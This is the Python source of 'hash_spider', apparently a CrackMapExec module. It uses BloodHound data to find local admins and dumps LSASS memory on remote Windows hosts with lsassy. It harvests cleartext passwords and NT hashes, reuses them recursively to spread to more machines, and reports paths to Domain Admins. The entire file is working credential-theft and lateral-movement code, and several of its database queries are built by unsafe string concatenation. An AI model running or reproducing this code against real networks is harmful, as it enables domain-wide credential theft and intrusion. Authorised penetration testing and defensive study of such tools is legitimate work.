313 lines
14 KiB
Python
313 lines
14 KiB
Python
#!/usr/bin/env python3
|
|
# -*- coding: utf-8 -*-
|
|
# Author: Peter Gormington (@hackerm00n on Twitter)
|
|
import logging
|
|
from sqlite3 import connect
|
|
from sys import exit
|
|
from neo4j import GraphDatabase, basic_auth
|
|
from neo4j.exceptions import AuthError, ServiceUnavailable
|
|
from lsassy.dumper import Dumper
|
|
from lsassy.parser import Parser
|
|
from lsassy.session import Session
|
|
from lsassy.impacketfile import ImpacketFile
|
|
|
|
credentials_data = []
|
|
admin_results = []
|
|
found_users = []
|
|
reported_da = []
|
|
|
|
|
|
def neo4j_conn(context, connection, driver):
|
|
if connection.config.get("BloodHound", "bh_enabled") != "False":
|
|
context.log.display("Connecting to Neo4j/Bloodhound.")
|
|
try:
|
|
session = driver.session()
|
|
list(session.run("MATCH (g:Group) return g LIMIT 1"))
|
|
context.log.display("Connection Successful!")
|
|
except AuthError as e:
|
|
context.log.fail("Invalid credentials")
|
|
except ServiceUnavailable as e:
|
|
context.log.fail("Could not connect to neo4j database")
|
|
except Exception as e:
|
|
context.log.fail("Error querying domain admins")
|
|
context.log.debug(e)
|
|
else:
|
|
context.log.fail("BloodHound not marked enabled. Check cme.conf")
|
|
exit(1)
|
|
|
|
|
|
def neo4j_local_admins(context, driver):
|
|
global admin_results
|
|
try:
|
|
session = driver.session()
|
|
admins = session.run("MATCH (c:Computer) OPTIONAL MATCH (u1:User)-[:AdminTo]->(c) OPTIONAL MATCH (u2:User)-[:MemberOf*1..]->(:Group)-[:AdminTo]->(c) WITH COLLECT(u1) + COLLECT(u2) AS TempVar,c UNWIND TempVar AS Admins RETURN c.name AS COMPUTER, COUNT(DISTINCT(Admins)) AS ADMIN_COUNT,COLLECT(DISTINCT(Admins.name)) AS USERS ORDER BY ADMIN_COUNT DESC") # This query pulls all PCs and their local admins from Bloodhound. Based on: https://github.com/xenoscr/Useful-BloodHound-Queries/blob/master/List-Queries.md and other similar posts
|
|
context.log.success("Admins and PCs obtained.")
|
|
except Exception:
|
|
context.log.fail("Could not pull admins")
|
|
exit()
|
|
admin_results = [record for record in admins.data()]
|
|
|
|
|
|
def create_db(local_admins, dbconnection, cursor):
|
|
cursor.execute("""CREATE TABLE if not exists pc_and_admins ("pc_name" TEXT UNIQUE, "local_admins" TEXT, "dumped" TEXT)""")
|
|
for result in local_admins:
|
|
cursor.execute(
|
|
"INSERT OR IGNORE INTO pc_and_admins(pc_name, local_admins, dumped) VALUES(?, ?, ?)",
|
|
(
|
|
result.get("COMPUTER"),
|
|
str(
|
|
result.get("USERS"),
|
|
),
|
|
"FALSE",
|
|
),
|
|
)
|
|
dbconnection.commit()
|
|
cursor.execute("""CREATE TABLE if not exists admin_users("username" TEXT UNIQUE, "hash" TEXT, "password" TEXT)""")
|
|
admin_users = []
|
|
for result in local_admins:
|
|
for user in result.get("USERS"):
|
|
if user not in admin_users:
|
|
admin_users.append(user)
|
|
for user in admin_users:
|
|
cursor.execute("""INSERT OR IGNORE INTO admin_users(username) VALUES(?)""", [user])
|
|
dbconnection.commit()
|
|
|
|
|
|
def process_creds(context, connection, credentials_data, dbconnection, cursor, driver):
|
|
if connection.args.local_auth:
|
|
context.log.extra["host"] = connection.conn.getServerDNSDomainName()
|
|
else:
|
|
context.log.extra["host"] = connection.domain
|
|
context.log.extra["hostname"] = connection.host.upper()
|
|
for result in credentials_data:
|
|
username = result["username"].upper().split("@")[0]
|
|
nthash = result["nthash"]
|
|
password = result["password"]
|
|
if result["password"] is not None:
|
|
context.log.highlight(f"Found a cleartext password for: {username}:{password}. Adding to the DB and marking user as owned in BH.")
|
|
cursor.execute(
|
|
"UPDATE admin_users SET password = ? WHERE username LIKE '" + username + "%'",
|
|
[password],
|
|
)
|
|
username = f"{username.upper()}@{context.log.extra['host'].upper()}"
|
|
dbconnection.commit()
|
|
session = driver.session()
|
|
session.run('MATCH (u) WHERE (u.name = "' + username + '") SET u.owned=True RETURN u,u.name,u.owned')
|
|
if nthash == "aad3b435b51404eeaad3b435b51404ee" or nthash == "31d6cfe0d16ae931b73c59d7e0c089c0":
|
|
context.log.fail(f"Hash for {username} is expired.")
|
|
elif username not in found_users and nthash is not None:
|
|
context.log.highlight(f"Found hashes for: '{username}:{nthash}'. Adding them to the DB and marking user as owned in BH.")
|
|
found_users.append(username)
|
|
cursor.execute(
|
|
"UPDATE admin_users SET hash = ? WHERE username LIKE '" + username + "%'",
|
|
[nthash],
|
|
)
|
|
dbconnection.commit()
|
|
username = f"{username.upper()}@{context.log.extra['host'].upper()}"
|
|
session = driver.session()
|
|
session.run('MATCH (u) WHERE (u.name = "' + username + '") SET u.owned=True RETURN u,u.name,u.owned')
|
|
path_to_da = session.run("MATCH p=shortestPath((n)-[*1..]->(m)) WHERE n.owned=true AND m.name=~ '.*DOMAIN ADMINS.*' RETURN p")
|
|
paths = [record for record in path_to_da.data()]
|
|
|
|
for path in paths:
|
|
if path:
|
|
for key, value in path.items():
|
|
for item in value:
|
|
if type(item) == dict:
|
|
if {item["name"]} not in reported_da:
|
|
context.log.success(f"You have a valid path to DA as {item['name']}.")
|
|
reported_da.append({item["name"]})
|
|
exit()
|
|
|
|
|
|
def initial_run(connection, cursor):
|
|
username = connection.username
|
|
password = getattr(connection, "password", "")
|
|
nthash = getattr(connection, "nthash", "")
|
|
cursor.execute(
|
|
"UPDATE admin_users SET password = ? WHERE username LIKE '" + username + "%'",
|
|
[password],
|
|
)
|
|
cursor.execute(
|
|
"UPDATE admin_users SET hash = ? WHERE username LIKE '" + username + "%'",
|
|
[nthash],
|
|
)
|
|
|
|
|
|
class CMEModule:
|
|
name = "hash_spider"
|
|
description = "Dump lsass recursively from a given hash using BH to find local admins"
|
|
supported_protocols = ["smb"]
|
|
opsec_safe = True
|
|
multiple_hosts = True
|
|
|
|
def __init__(self, context=None, module_options=None):
|
|
self.context = context
|
|
self.module_options = module_options
|
|
self.reset = None
|
|
self.reset_dumped = None
|
|
self.method = None
|
|
@staticmethod
|
|
def save_credentials(context, connection, domain, username, password, lmhash, nthash):
|
|
host_id = context.db.get_computers(connection.host)[0][0]
|
|
if password is not None:
|
|
credential_type = 'plaintext'
|
|
else:
|
|
credential_type = 'hash'
|
|
password = ':'.join(h for h in [lmhash, nthash] if h is not None)
|
|
context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id)
|
|
def options(self, context, module_options):
|
|
"""
|
|
METHOD Method to use to dump lsass.exe with lsassy
|
|
RESET_DUMPED Allows re-dumping of hosts. (Default: False)
|
|
RESET Reset DB. (Default: False)
|
|
"""
|
|
self.method = "comsvcs"
|
|
if "METHOD" in module_options:
|
|
self.method = module_options["METHOD"]
|
|
self.reset_dumped = module_options.get("RESET_DUMPED", False)
|
|
self.reset = module_options.get("RESET", False)
|
|
|
|
def run_lsassy(self, context, connection, cursor): # copied and pasted from lsassy_dumper & added cursor
|
|
# lsassy uses a custom "success" level, which requires initializing its logger or an error will be thrown
|
|
# lsassy also removes all other handlers and overwrites the formatter which is bad (we want ours)
|
|
# so what we do is define "success" as a logging level, then do nothing with the output
|
|
logging.addLevelName(25, "SUCCESS")
|
|
setattr(logging, "success", lambda message, *args: ())
|
|
|
|
host = connection.host
|
|
domain_name = connection.domain
|
|
username = connection.username
|
|
password = getattr(connection, "password", "")
|
|
lmhash = getattr(connection, "lmhash", "")
|
|
nthash = getattr(connection, "nthash", "")
|
|
session = Session()
|
|
session.get_session(
|
|
address=host,
|
|
target_ip=host,
|
|
port=445,
|
|
lmhash=lmhash,
|
|
nthash=nthash,
|
|
username=username,
|
|
password=password,
|
|
domain=domain_name,
|
|
)
|
|
if session.smb_session is None:
|
|
context.log.fail("Couldn't connect to remote host. Password likely expired/changed. Removing from DB.")
|
|
cursor.execute(f"UPDATE admin_users SET hash = NULL WHERE username LIKE '{username}'")
|
|
return False
|
|
dumper = Dumper(session, timeout=10, time_between_commands=7).load(self.method)
|
|
if dumper is None:
|
|
context.log.fail("Unable to load dump method '{}'".format(self.method))
|
|
return False
|
|
file = dumper.dump()
|
|
if file is None:
|
|
context.log.fail("Unable to dump lsass")
|
|
return False
|
|
credentials, tickets, masterkeys = Parser(file).parse()
|
|
file.close()
|
|
ImpacketFile.delete(session, file.get_file_path())
|
|
if credentials is None:
|
|
credentials = []
|
|
credentials = [cred.get_object() for cred in credentials if not cred.get_username().endswith("$")]
|
|
credentials_unique = []
|
|
credentials_output = []
|
|
for cred in credentials:
|
|
if [
|
|
cred["domain"],
|
|
cred["username"],
|
|
cred["password"],
|
|
cred["lmhash"],
|
|
cred["nthash"],
|
|
] not in credentials_unique:
|
|
credentials_unique.append(
|
|
[
|
|
cred["domain"],
|
|
cred["username"],
|
|
cred["password"],
|
|
cred["lmhash"],
|
|
cred["nthash"],
|
|
]
|
|
)
|
|
credentials_output.append(cred)
|
|
self.save_credentials(context, connection, cred["domain"], cred["username"], cred["password"], cred["lmhash"], cred["nthash"])
|
|
global credentials_data
|
|
credentials_data = credentials_output
|
|
|
|
def spider_pcs(self, context, connection, cursor, dbconnection, driver):
|
|
cursor.execute("SELECT * from admin_users WHERE hash is not NULL")
|
|
compromised_users = cursor.fetchall()
|
|
cursor.execute("SELECT pc_name,local_admins FROM pc_and_admins WHERE dumped LIKE 'FALSE'")
|
|
admin_access = cursor.fetchall()
|
|
for user in compromised_users:
|
|
for pc in admin_access:
|
|
if user[0] in pc[1]:
|
|
cursor.execute(f"SELECT * FROM pc_and_admins WHERE pc_name = '{pc[0]}' AND dumped NOT LIKE 'TRUE'")
|
|
more_to_dump = cursor.fetchall()
|
|
if len(more_to_dump) > 0:
|
|
context.log.display(f"User {user[0]} has more access to {pc[0]}. Attempting to dump.")
|
|
connection.domain = user[0].split("@")[1]
|
|
setattr(connection, "host", pc[0].split(".")[0])
|
|
setattr(connection, "username", user[0].split("@")[0])
|
|
setattr(connection, "nthash", user[1])
|
|
setattr(connection, "nthash", user[1])
|
|
try:
|
|
self.run_lsassy(context, connection, cursor)
|
|
cursor.execute("UPDATE pc_and_admins SET dumped = 'TRUE' WHERE pc_name LIKE '" + pc[0] + "%'")
|
|
|
|
process_creds(
|
|
context,
|
|
connection,
|
|
credentials_data,
|
|
dbconnection,
|
|
cursor,
|
|
driver,
|
|
)
|
|
self.spider_pcs(context, connection, cursor, dbconnection, driver)
|
|
except Exception:
|
|
context.log.fail(f"Failed to dump lsassy on {pc[0]}")
|
|
if len(admin_access) > 0:
|
|
context.log.fail("No more local admin access known. Please try re-running Bloodhound with newly found accounts.")
|
|
exit()
|
|
|
|
def on_admin_login(self, context, connection):
|
|
db_path = connection.config.get("CME", "workspace")
|
|
# DB will be saved at ./CrackMapExec/hash_spider_default.sqlite3 if workspace in cme.conf is "default"
|
|
db_name = f"hash_spider_{db_path}.sqlite3"
|
|
dbconnection = connect(db_name, check_same_thread=False, isolation_level=None)
|
|
|
|
cursor = dbconnection.cursor()
|
|
if self.reset:
|
|
try:
|
|
cursor.execute("DROP TABLE IF EXISTS admin_users;")
|
|
cursor.execute("DROP TABLE IF EXISTS pc_and_admins;")
|
|
context.log.display("Database reset")
|
|
exit()
|
|
except Exception as e:
|
|
context.log.fail("Database reset error", str(e))
|
|
exit()
|
|
|
|
if self.reset_dumped:
|
|
try:
|
|
cursor.execute("UPDATE pc_and_admins SET dumped = 'False'")
|
|
context.log.display("PCs can be dumped again.")
|
|
except Exception as e:
|
|
context.log.fail("Database update error", str(e))
|
|
exit()
|
|
|
|
neo4j_user = connection.config.get("BloodHound", "bh_user")
|
|
neo4j_pass = connection.config.get("BloodHound", "bh_pass")
|
|
neo4j_uri = connection.config.get("BloodHound", "bh_uri")
|
|
neo4j_port = connection.config.get("BloodHound", "bh_port")
|
|
neo4j_db = f"bolt://{neo4j_uri}:{neo4j_port}"
|
|
driver = GraphDatabase.driver(neo4j_db, auth=basic_auth(neo4j_user, neo4j_pass), encrypted=False)
|
|
neo4j_conn(context, connection, driver)
|
|
neo4j_local_admins(context, driver)
|
|
create_db(admin_results, dbconnection, cursor)
|
|
initial_run(connection, cursor)
|
|
context.log.display("Running lsassy")
|
|
self.run_lsassy(context, connection, cursor)
|
|
process_creds(context, connection, credentials_data, dbconnection, cursor, driver)
|
|
context.log.display("🕷️ Starting to spider 🕷️")
|
|
self.spider_pcs(context, connection, cursor, dbconnection, driver)
|